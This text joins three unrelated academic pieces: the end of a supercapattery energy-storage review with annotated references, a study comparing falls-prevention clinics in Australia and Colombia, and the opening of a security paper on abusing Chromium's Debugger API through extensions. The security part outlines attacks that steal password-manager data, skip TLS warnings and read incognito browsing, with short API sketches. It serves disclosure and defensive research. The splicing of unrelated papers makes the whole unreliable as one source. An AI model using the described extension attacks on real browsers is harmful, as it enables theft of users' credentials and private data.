Transition metal oxides are usually used on the positrode, but iron and tungsten oxides undergo reversible changes at negative potentials [63][64][65]. A crystalline/amorphous core/shell structured iron oxide with oxygen vacancies exhibited both capacitive and Nernstian features in 1 mol/L LiOH, as shown in Fig. 3a and 3b. A specific capacitance of 701 F/g was claimed, averaged from the GCD plot. However, the reported GCD at 0.5 mA/cm² was nonlinear, whilst the equation used for the capacitance calculation, Csp = iΔt/(mΔV), actually gives results for the inserted triangular dashed line in Fig. 3b. Thus, the performance would be better represented by the specific charge. Further, the GCD is asymmetrical along the time axis, showing longer times for charging than for discharging, which suggests a Coulombic efficiency much lower than that of a true capacitive electrode. Fig. 3c and 3d compare the CVs and GCDs of WO3 and W5O14. Clearly, the oxygen-deficient W5O14 performed better. In addition, the crystalline W5O14 contained more ion channels than WO3. Consequently, the specific capacitance increased from 371 F/g for WO3 to 524 F/g for W5O14, as derived from fairly linear GCDs. Note that, against convention, the GCDs in Fig. 3d start with discharging followed by charging.
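The distinction drawn here between specific capacitance and specific charge can be made explicit. For a GCD recorded at constant current i on an electrode of active mass m, a restatement of the standard definitions (not equations taken from the original text):

```latex
C_{sp} = \frac{i\,\Delta t}{m\,\Delta V} \quad \text{(meaningful only for linear GCDs)}
Q_{sp} = \frac{i\,\Delta t}{m} \quad \text{(valid for any GCD shape)}
```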
An advanced approach to avoiding water decomposition is to use the so-called water-in-salt (WIS) electrolytes, in which all water molecules are bound to, or closely surround, salt ions; in such electrolytes, water decomposition may not occur up to 3.0 V [66][67][68][69]. However, because cations and anions are separated by only a few layers of coordination and solvation water molecules, and hence attract each other strongly, WIS electrolytes show high viscosity and low conductivity. The addition of co-solvents can improve the performance, but it also narrows the potential window [67,70].
Non-aqueous electrolytes, including ionic liquids, offer wider potential windows for utilising the very negative potentials of, for instance, lithium metal or lithiated carbon [9-11,13-15,45,[71][72][73]. In such cases, the electrolyte not only conducts ions but also participates in redox reactions, e.g. lithium-ion reduction or intercalation, which contributes directly to the dis-/charging of the cell.
Similarly, redox electrolytes also help enhance storage in supercapacitors via both capacitive and Nernstian mechanisms [51][52][53][54],[74]. Compared with making new electrode materials, dissolved redox species (DRS) in the electrolyte offer a simpler and cheaper approach to enhanced storage. A key issue is the cycling of electro-reacted DRS between the positrode and negatrode via diffusion. For example, halide ions (X−) were among the early DRS [51,74], with the reversible electro-reaction 3X− = X3− + 2e−. Because both X− and X3− are anions, they should be electrostatically attracted to, and trapped inside, the pores of the activated carbon positrode. However, oxidation of I− occurs near the equal potential of the positrode and negatrode at full discharge, causing insufficient electrostatic attraction and hence redox cycling [52]. This understanding explains the current peaks near 0 V on the cell CV in Fig. 4a, and agrees with the absence of any current peaks on the CVs in Fig. 4b for the cell containing Br−, whose oxidation potential is about 500 mV more positive than that of I−. Fig. 4c shows that simply discharging the cell to 0.1 V (rather than 0 V) also eliminated redox cycling [53]. By doing so, the cell repeated dis-/charging at 0.5 A/g for 4000 cycles with only 4% capacitance loss.
Emerging merit-merging innovations
A notable recent advance is the combination of more than two storage mechanisms in one supercapattery. A zinc-bromine supercapattery was studied that combines EDL capacitive, pseudocapacitive and Nernstian storage [54], although the claimed pseudocapacitive storage was in fact Nernstian, involving Br− oxidation. This supercapattery delivered 270 Wh/kg at 9300 W/kg with 81% capacity retention after 5000 cycles.
The combination of a positrode made of a polyaniline/nano carbon fibre (NCF) composite, an NCF negatrode for lithium intercalation, and a polymer gel electrolyte has led to a flexible supercapattery offering a specific energy of 106.5 Wh/kg and 70.3% capacity retention after 9000 cycles [75].
Last but not least, the sandwich configuration of supercapatteries (and supercapacitors) permits the use of bipolar electrodes to stack multiple cells in series [76]. A basic advantage is that if n cells are to be serially connected, the number of electrodes needed is 2n for external connection but only n+1 for bipolar stacking [76]. This significantly reduces the mass and volume of the stack, benefiting all gravimetric and volumetric properties. Importantly, the bipolar plates must be both liquid- and gas-proof. While the initial effort used titanium foils as the bipolar plates, it was later shown that 50 μm thick carbon black/polyethylene composite films could be sufficiently conductive (through the film plane) and non-permeable, which also helped the fabrication of pouch cells for stacking [77]. A stack of bipolarly connected Zn-Br2 cells performed satisfactorily, reaching 50 Wh/L and 500 W/L with less than 1% loss over 500 dis-/charging cycles. Graphite plates with vertically grown CNTs on both sides were also used to stack EDL cells, which retained 96.7% of the initial capacity after 50,000 cycles [78].
End remarks
Supercapattery is being developed amid ongoing questions about how battery and supercapacitor should be defined, particularly in relation to the confusion over pseudocapacitance. It is identified that electrode reactions can involve the transfer of either localised valence electrons, governed by the Nernst equation, which is the basis of batteries, or zone-delocalised valence electrons, leading to pseudocapacitive behaviour. Aiming at merging the merits of Faradaic Nernstian and capacitive storage mechanisms, supercapattery research has progressed steadily since 2018, utilising nanostructured and compounded metal oxides and sulfides capable of Nernstian storage, water-in-salt and redox-active electrolytes, and bipolar stacks. There is undoubtedly room for further improvement but, thanks to the knowledge and technology advancements in batteries and supercapacitors, supercapattery will become more competitive and promising in the near future.
Conflict of interest statement
The author has no conflict of interest to declare.
Acknowledgements
The author thanks all collaborators and the postdoctoral and postgraduate co-workers whose names appear in the list of References for their invaluable research contributions, and acknowledges the financial support from the EPSRC (EP/J000582/1, GR/R68078) and the Royal Society.

Annotated references

The authors have made a good effort to clarify some typical misuses of scientific and technical terms, and some conceptual misunderstandings and confusions in the EES literature, such as anode and cathode versus negatrode and positrode in terms of electrode reactions and electrical polarity, and pseudocapacitance versus battery-like storage in terms of Faradaic processes.

This article reviews a relatively rare collection of literature on sodium- and potassium-ion capacitors, focusing on the anode (= negatrode) materials. It is worth reading if one considers the sustainability of energy storage technologies in terms of the wide and cheap availability of sodium and potassium resources compared with the highly geographically limited lithium resources.
In the context of LICs, the authors focus on the preparation, characterisation and application of various carbon materials for making the cathode (= positrode) and anode (= negatrode), highlighting the approaches to, and the effects of, nanoengineering, doping, graphitisation, porous structuring and surface modification.
[16]* Lalwani S, Joshi A, Singh G, Sharma RK: Sulphur doped iron cobalt oxide nanocaterpillars: An electrode for supercapattery with ultrahigh energy density and oxygen evolution reaction. Electrochim Acta 2019, 328:135076. https://doi.org/10.1016/j.electacta.2019.135076
The authors report a novel study on the positive contribution of doping FeCo2O4 with sulfur to increasing the specific capacitance. The hydrothermal process for sulfur doping is likely also effective on other transition metal oxides.

The authors report a hydrothermal process for growing redox-active MoS2 in the sub-micron pores of a C3N4 template. The idea of preparing a composite of two metallic compounds by directly growing one in the porous template of the other is novel and effective. While the CVs and GCDs of the composite show good Nernstian storage performance, readers are advised not to test Nernstian materials in a symmetrical cell.

The authors report a rare work on doping Se into Ni-Co sulfide in the form of nanotubes or nanofibrils grown vertically on the individual fibres of carbon cloth, forming a free-standing positrode. Interesting SEM images of the nanotubes on a single fibre are presented. CVs and GCDs were systematically applied to study the composite, revealing a positive contribution of Se doping to the Nernstian storage capacity.

This is a systematic study of the interesting electrochemistry of V(III, IV, V) in the title-mentioned composite for lithium storage at high positive potentials (3.0 to 4.3 V vs. Li+/Li) in a mixed organic carbonate electrolyte. The specific energy of a supercapattery combining this composite positrode with an activated carbon negatrode was measured to be 53 Wh/kg at a cell voltage of 2.7 V. The negatrode-to-positrode mass ratio was 2:1, but no explanation was given of how this ratio was selected, implying that further improvement may be achievable.

A very simple approach is proposed and tested successfully to avoid the redox cycling of iodide and tri-iodide ions between a positrode and negatrode of the same carbon material, by limiting the discharging cell voltage to 0.1 V instead of 0 V. This approach should also be applicable to avoid redox cycling in other supercapatteries with capacitive electrodes and redox-active electrolytes.
[54]** Yu F, Zhang CM, Wang FX, Gu YY, Zhang PP, Wacklawik ER, Du AJ, Ostrikov K, Wang HX: A zinc bromine "supercapattery" system combining triple functions of capacitive, pseudocapacitive and battery-type charge storage. Mater Horiz 2020, 7:495-503. https://doi.org/10.1039/c9mh01353a
The authors report an effective research effort to combine three different charge storage mechanisms in a single aqueous supercapattery. The claimed specific energy of 270 Wh/kg (without considering the mass of the KBr added to the electrolyte) is among the top range of all reported EES devices with aqueous electrolytes.
The work reported is a conductive and non-permeable polymer-carbon composite membrane as thin as 40 μm. The conductivity of the composite is actually not very high in comparison with conventional conducting materials but, because of the thinness of the membrane, its through-plane resistance is sufficiently small. The challenging task is then to make such a thin membrane non-permeable to ions in aqueous solution, which seems to have been achieved successfully. The work represents important progress in the development of affordable and corrosion-resistant bipolar plate materials for serially stacking multiple EES cells.

Fig. 1. CVs (a) and cyclic esrogram (b) of polyaniline. Redrawn from refs. [34] and [30].

Fig. 4. CVs of a supercapattery with an activated carbon positrode and negatrode containing the indicated electrolytes. Note that the potential window is from 0 to 1.5 V in (a) and (b) but from 0.1 to 1.5 V in (c), where the black-line and red dashed-line CVs were recorded before and after 100 charging-discharging cycles. Redrawn from refs. [52,53].
Differing approaches to falls and fracture prevention between Australia and Colombia
Falls and fractures are major causes of morbidity and mortality in older people. Importantly, previous falls and/or fractures are the most important predictors of further events. Therefore, secondary prevention programs for falls and fractures are highly needed. However, the question is whether a secondary prevention model should focus on falls prevention alone or be implemented in combination with fracture prevention. By comparing a falls prevention clinic in Manizales (Colombia) with a falls and fracture prevention clinic in Sydney (Australia), the objective was to identify similarities and differences between these two programs and to propose an integrated model of care for the secondary prevention of falls and fractures. A comparative study of the services was performed using an internationally agreed taxonomy. Service provision was compared against benchmarks set by the National Institute for Health and Clinical Excellence (NICE) and previous reports in the literature. The comparison included organization, administration, client characteristics, and interventions. Several similarities, and a number of differences that could easily be unified into a single model, are reported here. Similarities included the population served, a multidisciplinary team, and a multifactorial assessment and intervention. Differences were the eligibility criteria, the bone health assessment component, and the therapeutic interventions most commonly used at each site. In Australia, bone health assessment is reinforced, whereas in Colombia dizziness assessment and management is pivotal. The authors propose that falls clinic services should be operationally linked to osteoporosis services, such as a "falls and fracture prevention clinic," which would facilitate a comprehensive intervention to prevent falls and fractures in older persons.
Introduction
Falls and fractures are intimately linked and are major causes of morbidity and mortality in older people. A previous fall and/or fracture is the most important risk factor for further events; 1 therefore, secondary prevention programs for falls and fractures are highly needed. Although falls clinics have been established as a model of care for falls management and prevention among the elderly, there is no widely accepted definition or standard model for a falls clinic in the research literature. Falls clinics have been defined as: … specialist multidisciplinary services, which focus on the assessment and management of clients with falls, mobility and balance problems. Clinics commonly provide time limited, specialist intervention to the client and advice and referral to mainstream services for ongoing management. They provide education and training to clients, to carers, and to health professionals. 2 Since the late 1980s, falls clinics have been gaining momentum as an integrated model for falls prevention around the world. The first multidisciplinary falls clinic was set up in Melbourne, Australia in 1988. 2 Subsequently, the number of falls clinics has increased substantially since the late 1990s, in countries including Australia, 1-4 the USA, 5-8 the UK, 9 France, 10 Denmark, 11 Spain, 12 Hong Kong, 13 Canada, 14 Germany, 15 and The Netherlands. 16 In contrast, in Latin America the information on falls clinics is scarce, with reports only from Brazil and Colombia. 17,18 Overall, these programs offer a comprehensive assessment and varied interventions focused on falls prevention in older persons without taking bone health assessment into consideration. In fact, until 2000 it was common practice not to include any assessment of osteoporosis risk or to measure bone mineral density in falls prevention trials. As a consequence, osteoporosis risk assessment was not considered part of a major falls prevention guideline. 19 In 2001, the National Health Service in the UK established the National Service Framework for Older People, a comprehensive strategy to ensure fair, high quality, integrated health and social care services for older people. The National Service Framework set out standards for specialized and integrated falls services to improve care and treatment for those who have fallen and, for the first time, included interventions to prevent and treat osteoporosis in those at high risk. Following these guidelines, there was an increasing understanding of the natural association between falls and fractures, and it was thus proposed to incorporate a routine bone health assessment as part of a comprehensive falls and fracture risk assessment in older persons. 20 However, little operational guidance was provided until a review and clinical guideline undertaken by the National Health Service policy body, the National Institute for Health and Clinical Excellence (NICE), were published in 2004. 21 In those guidelines, NICE suggested that specialist falls services should be operationally linked to bone health (osteoporosis) services and recommended that an osteoporosis risk assessment should be an essential element of a comprehensive falls assessment. 21 Since the release of these guidelines, the number of falls clinics that integrate a bone health component has grown exponentially, particularly at university hospitals. 13,14,16 However, standardizing these programs and making them efficient across different cultures and practices is still a challenge.
Another remaining question is whether the model should address falls prevention alone or be combined with fracture prevention. Therefore, the aim of this study was to identify similarities and differences between a falls clinic in Colombia and a falls and fractures clinic in Australia. Characteristics of the services were compared using an internationally agreed taxonomy. Here, major similarities, as well as easy-to-unify variations, between these complementary models implemented in the two countries are reported.
Methods
In Sydney, Australia, the Falls and Fractures Clinic at Nepean Hospital in Penrith began operation in October 2008 as an initiative of both the Discipline of Geriatric Medicine at Sydney Medical School Nepean and the Department of Geriatric Medicine at Nepean Hospital. Its primary aim was to reduce falls and falls-related injuries among older people in the Western Sydney community after one or multiple falls and/or fractures. In Manizales (Colombia), the Falls, Dizziness, and Vertigo Clinic at the local Geriatric Hospital was implemented in April 2001 as an initiative of the Section of Geriatric Medicine of the Faculty of Health at the Universidad de Caldas. In addition to the aim of reducing falls among older people in this Andes Mountains community, the clinic aimed to ameliorate dizziness symptoms in older fallers.
The analysis was designed to explore and compare the organizational structure and clinical operations of both clinics. Evaluated items were either taken from prior research on Australian falls clinics 2 or developed specifically for this study, with emphasis on falls and fracture assessment and patient care. The questionnaire assessed characteristics of the organization, administration, clients, and interventions provided at both clinics. Items surveying program organization included: date of commencement, setting of recruitment and assessment, frequency and duration of each assessment session, and referral sources. Administration items surveyed the number of patients attended, number of staff, staffing structure, time for initial assessment, waiting time for service, and percentage of attrition. The age, proportion of men and women, and eligibility criteria were surveyed to compare the clients in the two countries. Directors were asked to describe the assessment and reassessment procedures and the types of intervention provided. In addition, data were collected on risk status identification, outcomes measured, and postintervention follow-up procedures. The questionnaire also assessed whether interventions were provided by the local service or by referral to other services, referral routes, and relationships to other local facilities and services. To make the comparison easier and to develop a common language for comparing the characteristics of the clinics, the Prevention of Falls Network Europe (ProFaNE) taxonomy of falls prevention interventions was used. 24 The implementation of the NICE recommendations was also compared.
Results
A summary of the organization, administration, clients, and interventions at both clinics is shown in Table 1. Concerning organizational aspects, the setting was an acute hospital in Australia and a subacute geriatric hospital in Colombia. The programs in the two countries operated with the same frequency and duration (4 hours per week). The most common method of entry into the service was referral from a health care professional: a general practitioner in Australia and a specialist (geriatrician, physiatrist, otolaryngologist, or rheumatologist) in Colombia. In addition, both services accepted referrals from acute hospitals, although in Australia these came mostly from the emergency department and orthopedic/geriatric wards. In Colombia, referrals from nursing care facilities were also accepted.
The number of clients attending the program and the number of patients attending per week were higher in the Australian program than in the Colombian one (an average of six versus three patients per session). In terms of staff, the clinical staff in Australia was twice the size of that in Colombia. However, in both clinics the staffing structure was a multidisciplinary team composed of a physiotherapist, a nurse, an occupational therapist, and a physician. At both clinics, members of the interdisciplinary team had engaged in discussions on assessment tools and program planning over a 1-year period prior to the establishment of the corresponding clinic. The mean length of the initial assessment was similar at both clinics (2 hours per patient). The waiting list was much longer in Colombia than in Australia. The percentage of attrition was similar in the two countries. The mean age of clients was higher in Australia than in Colombia (82 versus 74 years). Similar proportions of men and women attended the clinics, with at least two-thirds being female. The main eligibility criteria for Australian clients were falls and/or fractures (at least one episode in the previous year), whereas for Colombian clients the criteria were a report of falls and/or dizziness. In terms of the interventions provided, practices were similar, with multicomponent interventions being used in both countries. Although both programs offered similar care plans for falls prevention, the Australian program was more likely to prescribe vitamin D supplementation, while the Colombian program was more likely to indicate individually supervised gentle balance exercises at home. Figure 1 shows the comparative flow diagram for the two countries. By comparison, the Australian program was directed at managing falls and fractures, while the Colombian program focused on managing dizziness and falls. A similar proportion of disciplines was included in the multidisciplinary assessment teams, and similar assessment tools were employed. While the Australian program included a bone health assessment, the Colombian program included more comprehensive fall risk screening tools in its assessment. The initial assessment at both clinics consists of a comprehensive fall risk assessment, including a structured algorithm adapted from the Assessing Care of Vulnerable Elders (ACOVE) intervention to identify risk factors for falls. 23 Recommendations for management are generated at an interdisciplinary meeting. Each patient also receives education consisting of written materials about falls prevention, physical activity, and home safety. Bone fragility fracture risk assessment was performed using the World Health Organization's Fracture Risk Assessment Tool (FRAX®) in Australia but not in Colombia. The identification of high-risk status for falling was similar in both programs. If additional interventions were needed, referral to other services was recommended. The postintervention follow-up procedures were similar in both countries, with the same interdisciplinary team reassessing the clients.
Discussion
This exploratory comparative analysis of two clinics in Australia and Colombia has revealed several similarities as well as differences. The clinics in the two countries have major similarities in terms of organization and administration. Both programs serve older people who are very similar in terms of age, gender, and geography (mountainous areas). In addition, the multifactorial assessment and intervention model utilized in both countries closely follows previously recommended models for falls clinics. 2,3 For the identification of high-risk status for falls, both programs use the indicators developed by the ACOVE program. 23 The similarity of these findings suggests that both models could become a convergent solution to the problems associated with falling in an aging population. Falls are relatively common in both countries, with similar prevalence: 28%-39% of people aged over 65 years experience at least one fall annually, and up to 50% experience multiple falls. 24,25 Overall, falls clinics have demonstrated substantial reductions (35%-77%) in falls in high-risk populations and improvements in other outcomes such as balance and mobility, physical functioning, and fear of falling. 3 Therefore, these clinics represent an approach that provides specialized services for this common geriatric syndrome in both developed and developing countries. 6,9,10,15,18 Beyond the overall similarities, there were several differences between the Australian and Colombian models. The first source of difference was the type of patients seen at each site in terms of race (mostly Caucasian in Australia and mostly Mestizo in Colombia), nutritional status (higher body mass index in Australia), and level of education (a secondary degree in most of the Australian population but in just half of the Colombian population). 27 Another difference was the eligibility criteria: falls, whether or not associated with a fragility fracture, were the priority in Australia, while falls associated with dizziness were the main focus in Colombia. This could be explained by the greater access to orthopedic/geriatric wards in Australia as well as the role of the recently implemented orthogeriatric model of care. 26 On the other hand, the prevalence of dizziness in the older Colombian population was reported to be 15.2% and was associated with more prevalent chronic conditions and physical and sensory impairments. 27 Therefore, the falls clinic in the Colombian program was established in conjunction with an otolaryngology service to provide interdisciplinary care for older people with falls associated with dizziness. 18 The second difference was the most common type of intervention prescribed at each clinic. Although the multicomponent programs were similar in both countries, the most commonly prescribed intervention differed. Although Australia has sunny weather for most of the year, it still cannot boast a vitamin D-safe population. 28 Reasons for this are that the lifestyles of many older people, particularly women, increasingly involve indoor activities, and that foods are not fortified with vitamin D in Australia. Taken together, there is a high prevalence of vitamin D deficiency in this particular Western Sydney population (45%), 29 and thus a high level of vitamin D supplementation is required.
In Colombia, the falls clinic prioritized gentle balance exercise interventions at home because, although 98% of Colombian older adults know about the benefits of exercise, only 5% exercise every day. 30 Nevertheless, although each clinic prioritizes a particular intervention for its target population, the overall comprehensive approach used in both settings is similar (Figure 1) and includes balance exercise, patient education, nutritional supplements, medication review, hearing and vision correction, and home modification. Overall, these evidence-based multifactorial interventions 31 should constitute the key elements of any secondary prevention program for falls in older persons.
In terms of integrating the fracture prevention component, at the Australian clinic fragility fracture risk is evaluated by clear identification of risk factors for fractures, quantification of the absolute risk of fracture using FRAX (a fracture risk assessment tool that is not widely used in Colombia), and bone mineral density measurement. Fracture risk assessment is followed by fracture prevention interventions such as osteoporosis treatment, calcium and vitamin D supplementation, and identification and treatment of secondary causes of bone loss.
Taken together, both programs use a similar approach to two very prevalent problems in older people. However, components of the models suggested by NICE 22 and ACOVE, 23 which are considered optimal practice for falls and fractures prevention, are at different stages of implementation in the two countries. Nevertheless, a common evaluation of both clinics allows a comprehensive revision of their processes and assessment tools, and could constitute an initial step toward developing an integrated model of secondary prevention of falls and fractures that could be implemented in both developed and developing countries worldwide. Based on this comparison, the authors propose that falls clinic services should be operationally linked to osteoporosis services as a "falls and fracture prevention clinic," which would facilitate a comprehensive intervention to prevent falls and fractures in older persons. More intensive studies are needed to gain a better understanding of how falls and fractures clinics operate and to identify more precisely their benefits and limitations. Finally, further evaluation through a randomized controlled trial is required to confirm the effectiveness and cost-effectiveness of this model of care.
Chrowned by an Extension: Abusing the Chrome DevTools Protocol through the Debugger API
The Chromium open-source project has become a fundamental piece of the Web as we know it today, with multiple vendors offering browsers based on its codebase. One of its most popular features is the possibility of altering or enhancing the browser's functionality through third-party programs known as browser extensions. Extensions have access to a wide range of capabilities through APIs exposed by Chromium. The Debugger API, arguably the most powerful of these APIs, allows extensions to use the Chrome DevTools Protocol (CDP), a capability-rich tool for debugging and instrumenting the browser. In this paper, we describe several vulnerabilities present in the Debugger API and in the granting of capabilities to extensions that can be used by an attacker to take control of the browser, escalate privileges, and break context isolation. We demonstrate their impact by introducing six attacks that allow an attacker to steal user information, monitor network traffic, modify site permissions (e.g., access to the camera or microphone), bypass security interstitials without user intervention, and change the browser settings. Our attacks work in all major Chromium-based browsers as they are rooted at the core of the Chromium project. We reported our findings to the Chromium Development Team, who have already fixed some of them and are currently working on fixing the remaining ones. We conclude by discussing how questionable design decisions, a lack of public specifications, and an overpowered Debugger API have contributed to enabling these attacks, and we propose mitigations.
Introduction
Modern browsers expose powerful APIs [25], [36] to enable the development of third-party browser extensions [35], [54]. These are small programs, built and released by third-party developers, that extend or enhance the default features offered by the browser, such as cookie management and ad-blocking. Because of their potential for abuse, these APIs are permission-protected, and not all of them are granted to extensions by default [25]. In the case of Chromium, the permission system is quite limited and does not offer a comprehensive set of protections as implemented, for example, in Android [4]. Anecdotal evidence has already shown how these APIs can be abused for nefarious purposes [5], [17].
One overlooked Chromium feature is the debugger permission [37], which grants access to a limited version of the powerful Chrome DevTools Protocol (CDP), a core Chromium component for debugging and instrumenting the browser through a command-passing interface. CDP is widely used for running End-to-End (E2E) tests on web-based applications through popular tools like Selenium, Puppeteer and Playwright, and for building crawlers. CDP exposes a WebSocket server to which external applications can connect. Chromium extensions may also communicate with this component using the Debugger API, which is protected by the debugger permission. The Debugger API is a general substitute for virtually any other extension API, as it grants total control over tabs, windows and critical browser resources. Such powerful capabilities are expected of a debugging tool, but they are also an obvious candidate for abuse if insecurely exposed to potentially malicious actors.
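To make the capability concrete, the following is a minimal sketch of how an extension holding the debugger permission can drive CDP through this API. The tab ID handling and the evaluated expression are illustrative; chrome.debugger.attach, sendCommand and detach are the documented entry points.

```javascript
// Background service worker of an extension declaring the "debugger" permission.
const DEBUGGEE_VERSION = "1.3"; // CDP protocol version string expected by the API

async function dumpTabTitle(tabId) {
  // Attach the extension as a debugger to the given tab...
  await chrome.debugger.attach({ tabId }, DEBUGGEE_VERSION);
  try {
    // ...then issue any CDP command, here evaluating JavaScript in the page.
    const result = await chrome.debugger.sendCommand(
      { tabId },
      "Runtime.evaluate",
      { expression: "document.title", returnByValue: true }
    );
    console.log("Title of debugged tab:", result.result.value);
  } finally {
    await chrome.debugger.detach({ tabId });
  }
}
```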
Despite the risks of granting third-party extensions access to such a powerful component, no previous work has systematically analyzed the robustness of the Debugger API implementation and its security implications. In fact, Chromium's Debugger API is already used by at least 434 extensions published on the Chrome Web Store, according to a permission measurement that we performed in June 2022. Furthermore, no official specification detailing the design and purposes of this component is publicly available. In this paper, we describe the results of a systematic security analysis of the Debugger API and related components in the Chromium codebase. Our analysis focuses on finding violations of a set of security requirements that we derive from Chromium's CRX API Security Checklist [13]. Through a systematic code review, we find multiple vulnerabilities that can be exploited by a third-party extension to (i) circumvent the permission model to elevate privileges and gain control over more capabilities than expected, including key browser features; and (ii) break the isolation principles implemented by Chromium to prevent an attacker from accessing third-party targets. Specifically, we present the following six attacks:
• Listing active targets ( §4.1). This is a privacy attack that can be used to track the list of running extensions and the user's browsing history, including URLs visited in an incognito window (a sketch of the underlying API call follows this list).
• Running on regular tabs ( §4.2). This attack allows an extension to steal any user information contained inside most browser tabs, including those in an incognito window, and to evaluate arbitrary code inside them to alter their behavior.
• Running on security interstitial tabs ( §4.3). We show how extensions can abuse the Debugger API to modify the contents of interstitial messages, including critical security messages such as TLS error dialogs. The API can also be used to skip interstitials completely with no user interaction.
• Running on WebUI tabs ( §4.4). This attack extends the capabilities of the second attack ( §4.2). It allows extensions to run on internal tabs (e.g., the settings page), thus allowing the modification of critical browser settings, including security-related ones.
• Running on other extensions ( §4.5). This attack allows extensions to debug any other running extension to steal sensitive information (such as plaintext passwords and credit card details stored in password managers) or modify its normal operation (e.g., change the receiving wallet of a cryptocurrency transaction).
• Attaching to the browser target ( §4.6). This attack interacts with a special, highly privileged target of the CDP that allows an extension to run on virtually any tab or extension and take full control of the browser.
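As an illustration of the first attack, below is a sketch of how an extension could enumerate debuggable targets. The filtering and logging are illustrative; chrome.debugger.getTargets is the documented API call, which, per the §4.1 attack description, exposed more target metadata than an extension should be able to observe.

```javascript
// Sketch of §4.1: enumerate every debuggable target the browser knows about.
function listTargets() {
  chrome.debugger.getTargets((targets) => {
    for (const t of targets) {
      // Each TargetInfo carries its type ("page", "background_page", ...),
      // title and URL, which is enough to reconstruct the list of running
      // extensions and the user's open tabs, including (per the paper's
      // §4.1 findings, prior to the fix) incognito ones.
      console.log(t.type, t.title, t.url);
    }
  });
}
```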
We confirm the feasibility of the proposed attacks on every major Chromium-based browser, including more privacy-focused solutions like Brave and Ungoogled Chromium. All of our attacks share the same root cause, which we attribute to a mix of questionable design decisions and excessive functionality granted to extensions through CDP and the debugger permission. Overall, our attacks exemplify the inherent tension in reconciling a debugging tool, which by definition has powerful capabilities, with an API exposed to untrusted third-party code. This is a challenging design area, and we discuss the causes, impact, and potential mitigations in §5.
Disclosure. We disclosed all our findings to the Chromium Development Team along with a practical Proof-of-Concept for each attack. The attack from §4.1 and the vulnerable behavior from §4.2 were reported in March 2022 1 and acknowledged as a bug by Google. It was fixed in May 2022, when the fix landed in Chromium Stable 102. The attack from §4.3 was reported in November 2021 2 and was fixed in Chromium Stable 103, 3 when it was assigned CVE-2022-2164. The attack from §4.4 was reported in December 2021, 4 marked as a duplicate, and merged with §4.5. As far as we know, this is the only bug that was previously known to the Chromium Team. The attack from §4.5 was reported in December 2021 5 and is still awaiting a fix from the Chromium Development Team. The attack from §4.6 was reported in December 2021 6 and again, for a different vulnerability, in March 2022. 7 The first report was marked as a duplicate and merged with §4.5. The second report, while initially flagged as a "high-severity bug," was then classified as "not-a-security-bug." We discuss this point in detail in §5.
Research artifacts. Proofs-of-Concept for all our attacks are available at https://github.com/josemmo/chrowned. All of them use the Manifest V3 specification to account for the approaching phase-out of Manifest V2 [39].
Background
Chromium is an open-source web browser project mostly developed and maintained by Google. Its codebase is the foundation for the Google Chrome browser, and it is widely reused by many other popular browsers, including Microsoft Edge, Brave, Samsung Internet, and Opera. This section provides technical background on Chromium extensions ( §2.1), the Chrome DevTools Protocol ( §2.2), and Chromium's Debugger API ( §2.3).
Chromium Extensions
Chromium extensions are programs consisting of a set of files and assets similar to those found in traditional web applications. They are typically packaged into a custom file format known as "CRX" and then submitted for distribution to the Chrome Web Store, the official distribution platform from Google. CRX packages are signed by extension developers using public-key cryptography to provide integrity and authenticity. As §3 explains, extensions can also be distributed outside the Chrome Web Store without the need for signatures through sideloading (e.g., using ZIP archives).
Extensions must have a mandatory JSON file named manifest.json. The manifest file contains basic metadata about the extension (e.g., name, version) and other properties, such as a background script (for running tasks or receiving events independently of any opened tab) and content scripts (for injecting code onto pages that match a given URL).
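As a concrete illustration, a minimal hypothetical manifest with these fields might look as follows; all names and URLs here are illustrative, not taken from the paper:

{
  "manifest_version": 3,
  "name": "Example extension",
  "version": "1.0.0",
  "background": { "service_worker": "background.js" },
  "content_scripts": [
    { "matches": ["https://example.com/*"], "js": ["content.js"] }
  ],
  "permissions": ["debugger"]
}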
Chromium implements several security features to protect its users from malicious extensions. One such feature is isolation, which prevents websites and extensions alike from running code in execution contexts outside their scope. Additionally, extensions must declare permissions in their manifest file to access sensitive resources (like the browsing history) or to break isolation and run on tabs with a given URL (i.e., through the use of host permissions). Some permissions are considered more dangerous than others because of the potential harm that their abuse or misuse can cause to users. For this reason, an extension containing one or more of these permissions will display a prompt during installation with brief warnings for each of them [27].
Chromium's permission model still presents important shortcomings, many of which have already been fixed on platforms like Android [4]. For example, once an extension is installed, it keeps unrestricted access to all declared permissions and there is no simple way to revoke access afterwards. Another limitation is transparency: the user warnings shown in the install dialog communicate what a permission enables at a technical level, but they do not clearly convey how impactful it can be for users' privacy and security if abused.
Chrome DevTools Protocol
Chromium has a built-in component known as the Chrome DevTools Protocol (CDP) [29], which allows web developers to instrument and debug the browser to the fullest extent. Although this component can be abused, as we demonstrate in this paper, it offers useful functionality for software developers and researchers. Selenium [69], Puppeteer [51] and Playwright [24] are three tools powered by CDP that are widely used for End-to-End (E2E) testing of web applications or for automating web scraping.
Any application using the CDP communicates with the browser by sending JSON-encoded messages to a WebSocket endpoint hosted by the Chromium process, which is also used to receive events triggered by the browser. For security and performance reasons, this endpoint has to be enabled by adding the --remote-debugging-port command line flag when launching the browser, followed by the port number the CDP server will be bound to (port 9222 by convention) [29].
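For illustration, the following hedged sketch (not from the paper) talks to such an endpoint from Node.js; it assumes Node 18+ (for the built-in fetch), the third-party ws WebSocket package, and a browser launched with --remote-debugging-port=9222:

// Sketch: talk to the CDP WebSocket endpoint of a locally debugged browser.
const WebSocket = require('ws'); // assumed third-party dependency

async function main() {
  // The HTTP endpoint advertises the WebSocket URL of the browser target.
  const res = await fetch('http://localhost:9222/json/version');
  const { webSocketDebuggerUrl } = await res.json();

  const ws = new WebSocket(webSocketDebuggerUrl);
  ws.on('open', () => {
    // CDP messages are JSON objects carrying an id, a method and params.
    ws.send(JSON.stringify({ id: 1, method: 'Target.getTargets', params: {} }));
  });
  ws.on('message', (data) => console.log(data.toString()));
}

main();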
The Chrome DevTools UI [8] uses the CDP under the hood to inspect and debug a target (e.g., a tab). Messages exchanged by the browser (host) and the DevTools UI (client) can also be inspected using the "Protocol monitor" drawer tab (see Figure 1). This feature is initially turned off, but it can be manually enabled from the "Experiments" section in the DevTools UI settings menu.
To account for the isolation between tabs, background pages, service workers, and other worlds from the browser, CDP introduces the concept of target, which can be any of the former. When a client wants to interact with a target, it first has to attach to it using the Target.attachToTarget command. It will then receive a session ID to forward CDP commands to the desired target. This ensures that, for example, if we want to evaluate JavaScript code on a particular tab, it will get executed only on our target and nowhere else. By default, when opening a WebSocket to the CDP server, the client attaches to what is known as the browser target. This is a special type of target that can list targets (i.e., Target.getTargets), attach to active ones and perform other instrumentation actions affecting the entire browser.
